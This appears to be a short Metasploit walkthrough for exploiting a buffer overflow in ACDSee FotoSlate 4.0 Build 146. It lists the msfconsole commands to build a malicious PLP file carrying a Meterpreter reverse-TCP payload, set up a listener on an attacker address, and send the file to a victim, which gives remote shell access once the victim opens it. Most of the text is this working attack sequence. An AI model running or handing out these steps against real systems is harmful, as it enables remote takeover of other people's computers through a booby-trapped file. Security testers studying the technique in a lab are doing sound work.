This module exploits a buffer overflow in ACDSee FotoSlate 4.0 Build 146 via a specially crafted id parameter in a String element. When viewing a malicious PLP file with the ACDSee FotoSlate product, a remote attacker could overflow a buffer and execute arbitrary code. This exploit has been tested on systems such as Windows XP SP3, Windows Vista, and Windows 7.
Exploit Targets
ACDSee FotoSlate 4.0 Build 146
Windows XP SP2
Windows 7
Requirement
Attacker: Backtrack 5
Victim PC: Windows XP
Open backtrack terminal type msfconsole
Now type use exploit/windows/fileformat/acdsee_fotoslate_string
Msf exploit (acdsee_fotoslate_string)>set payload windows/meterpreter/reverse_tcp
Msf exploit (acdsee_fotoslate_string)>set lhost 192.168.1.2 (IP of Local Host)
Msf exploit (acdsee_fotoslate_string)>exploit
After we successfully generate the malicious plp File, it will stored on your local computer
/root/.msf4/local/msf.plp
Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.2
exploit
Now send your msf.plp files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.